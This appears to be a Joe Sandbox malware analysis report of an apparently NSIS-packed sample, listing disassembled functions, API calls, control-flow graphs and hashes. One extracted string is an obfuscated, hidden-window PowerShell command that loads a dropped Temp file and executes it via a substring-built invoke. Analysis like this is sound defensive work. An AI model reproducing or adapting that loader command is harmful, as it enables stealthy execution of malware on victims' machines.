                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID: sportspladsers
                                      • API String ID: 2531174081-2609567324
                                      • Opcode ID: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
                                      • Instruction ID: 5a9a404093729f8c7a4ed64dcb73daf90ff889549f225b9df3951733f5861a8d
                                      • Opcode Fuzzy Hash: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
                                      • Instruction Fuzzy Hash: EB219DB1A00119BADF119FA5DD84ADEBFB9EF44354F14807AF904B6290C7788E41DBA8
                                      Function 004053D8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 635 4053d8-405423 CreateDirectoryA 636 405425-405427 635->636 637 405429-405436 GetLastError 635->637 638 405450-405452 636->638 637->638 639 405438-40544c SetFileSecurityA 637->639 639->636 640 40544e GetLastError 639->640 640->638
                                      APIs
                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040541B
                                      • GetLastError.KERNEL32 ref: 0040542F
                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405444
                                      • GetLastError.KERNEL32 ref: 0040544E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                      • API String ID: 3449924974-228423945
                                      • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                      • Instruction ID: 5d613d5f07efa900d759e60f8f8ec78c4c71b6ffd2fe208e339ff175f81ef67f
                                      • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                      • Instruction Fuzzy Hash: F3010871D14259EADF119FA0D9487EFBFB8EB04315F00417AE904B6280D378A644CFAA
                                      Function 00406024 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 641 406024-406044 GetSystemDirectoryA 642 406046 641->642 643 406048-40604a 641->643 642->643 644 40605a-40605c 643->644 645 40604c-406054 643->645 647 40605d-40608f wsprintfA LoadLibraryExA 644->647 645->644 646 406056-406058 645->646 646->647
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
                                      • wsprintfA.USER32 ref: 00406074
                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%s.dll$UXTHEME$\
                                      • API String ID: 2200240437-4240819195
                                      • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                      • Instruction ID: 72752c577983536edbae7b7a4b2c1439e1101fa4b93fa8d0208d5a4e16dde88a
                                      • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                      • Instruction Fuzzy Hash: E6F0FC30A40109AADB14E764DC0DFEB365CAB09305F140576A546E11D1D578E9258B69
                                      Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 648 402e9f-402eb3 649 402eb5 648->649 650 402ebc-402ec4 648->650 649->650 651 402ec6 650->651 652 402ecb-402ed0 650->652 651->652 653 402ee0-402eed call 40307b 652->653 654 402ed2-402edb call 403091 652->654 658 403032 653->658 659 402ef3-402ef7 653->659 654->653 662 403034-403035 658->662 660 40301b-40301d 659->660 661 402efd-402f1d GetTickCount call 406175 659->661 663 403066-40306a 660->663 664 40301f-403022 660->664 672 403071 661->672 674 402f23-402f2b 661->674 666 403074-403078 662->666 667 403037-40303d 663->667 668 40306c 663->668 669 403024 664->669 670 403027-403030 call 40307b 664->670 675 403042-403050 call 40307b 667->675 676 40303f 667->676 668->672 669->670 670->658 682 40306e 670->682 672->666 679 402f30-402f3e call 40307b 674->679 680 402f2d 674->680 675->658 684 403052-40305e call 405a13 675->684 676->675 679->658 687 402f44-402f4d 679->687 680->679 682->672 691 403060-403063 684->691 692 403017-403019 684->692 689 402f53-402f70 call 406195 687->689 694 403013-403015 689->694 695 402f76-402f8d GetTickCount 689->695 691->663 692->662 694->662 696 402fd2-402fd4 695->696 697 402f8f-402f97 695->697 700 402fd6-402fda 696->700 701 403007-40300b 696->701 698 402f99-402f9d 697->698 699 402f9f-402fca MulDiv wsprintfA call 404f12 697->699 698->696 698->699 706 402fcf 699->706 704 402fdc-402fe1 call 405a13 700->704 705 402fef-402ff5 700->705 701->674 702 403011 701->702 702->672 710 402fe6-402fe8 704->710 708 402ffb-402fff 705->708 706->696 708->689 709 403005 708->709 709->672 710->692 711 402fea-402fed 710->711 711->708
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: 9602dbfda00556d7c5e8c3807bc55e7cb8e0f1d2c4b54ec9ade86eedd9cec4cc
                                      • Instruction ID: 4ab2a5a1bcd3fb7fa9d72e81aa521510b391fe67da8672e6f00875cd24a8b3cf
                                      • Opcode Fuzzy Hash: 9602dbfda00556d7c5e8c3807bc55e7cb8e0f1d2c4b54ec9ade86eedd9cec4cc
                                      • Instruction Fuzzy Hash: 7D518F729022199BDF10DF65DA08A9F7BB8AF40795F14413BF800B72C4C7789E51DBAA
                                      Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 712 401f90-401f9c 713 401fa2-401fb8 call 402a3a * 2 712->713 714 402057-402059 712->714 723 401fc7-401fd5 LoadLibraryExA 713->723 724 401fba-401fc5 GetModuleHandleA 713->724 716 4021c4-4021c9 call 401423 714->716 722 4028cf-4028de 716->722 726 401fd7-401fe4 GetProcAddress 723->726 727 402050-402052 723->727 724->723 724->726 729 402023-402028 call 404f12 726->729 730 401fe6-401fec 726->730 727->716 734 40202d-402030 729->734 732 402005-402021 730->732 733 401fee-401ffa call 401423 730->733 732->734 733->734 743 401ffc-402003 733->743 734->722 737 402036-40203e call 403619 734->737 737->722 742 402044-40204b FreeLibrary 737->742 742->722 743->734
                                      APIs
                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                        • Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                        • Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                      Strings
                                      • "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", xrefs: 0040200F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
                                      • API String ID: 2987980305-2894214451
                                      • Opcode ID: c931239866a18927b86319141aba466e32f85728b26c7023af3430785e4db318
                                      • Instruction ID: 033e4e5f5e4c037d50d2464c5542d6b5672e4837e9f8cb01fb8d89ff16108e1c
                                      • Opcode Fuzzy Hash: c931239866a18927b86319141aba466e32f85728b26c7023af3430785e4db318
                                      • Instruction Fuzzy Hash: 1A212B72904211FBDF217FA48E49AAE76B1AB45318F30423BF701B62D0C7BD49459A6E
                                      Function 0040599B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 744 40599b-4059a5 745 4059a6-4059d1 GetTickCount GetTempFileNameA 744->745 746 4059e0-4059e2 745->746 747 4059d3-4059d5 745->747 749 4059da-4059dd 746->749 747->745 748 4059d7 747->748 748->749
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004059AF
                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059C9
                                      Strings
                                      • nsa, xrefs: 004059A6
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 0040599B
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040599E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-1218156502
                                      • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                      • Instruction ID: 3a3981258a6ccd3f3c7180c2fb01dffc681fdc90015df490a153c8b64b3610b8
                                      • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                      • Instruction Fuzzy Hash: 6DF08276708214ABEB108F55EC04B9B7B9CDF91760F10C03BFA48DA190D6B599548B99
                                      Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,?,00405870,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405812
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B
                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                        • Part of subcall function 004053D8: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040541B
                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,00000000,00000000,000000F0), ref: 00401634
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 00401629
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe
                                      • API String ID: 1892508949-143564976
                                      • Opcode ID: dc3f2b08dd0b23deb2200b8cff6eb9b6ab41173e829b03834ce904b4ad95c354
                                      • Instruction ID: 4fb2b9239308f527e4829455642bf5c86be9504270dcf99fcce102751257b2ff
                                      • Opcode Fuzzy Hash: dc3f2b08dd0b23deb2200b8cff6eb9b6ab41173e829b03834ce904b4ad95c354
                                      • Instruction Fuzzy Hash: 1611E736508141ABEF217F650D415BF27B0EA92325738467FE592B62E2C63C4942A63F
                                      Function 0040548A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
                                      • CloseHandle.KERNEL32(?), ref: 004054C0
                                      Strings
                                      • Error launching installer, xrefs: 0040549D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
                                      • Instruction ID: 90ee3f3d0c484d323fd0424032eb65db2415cafeee3384e03f1d9bc4b04e7a5d
                                      • Opcode Fuzzy Hash: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
                                      • Instruction Fuzzy Hash: FFE04FB4A002097FEB009B60EC05F7B7BBCEB00348F408561BD11F21A0E374A9508A78
                                      Function 00406779 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
                                      • Instruction ID: ac331763182a67db8ffe8b732b67c8974d54266b30473341b06133cd37c0d4bc
                                      • Opcode Fuzzy Hash: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
                                      • Instruction Fuzzy Hash: ECA13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                      Function 0040697A Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
                                      • Instruction ID: e89747aace1fce0fcb13a8d80e6f88749465aa03c559881c8099c8d07fdfb4d2
                                      • Opcode Fuzzy Hash: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
                                      • Instruction Fuzzy Hash: BE911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                      Function 00406690 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
                                      • Instruction ID: d456333056e0522eb9a81365918d8492ce98a85054e5b278218ea4b7938feab7
                                      • Opcode Fuzzy Hash: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
                                      • Instruction Fuzzy Hash: E1814671D04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C778AA96DF44
                                      Function 00406195 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
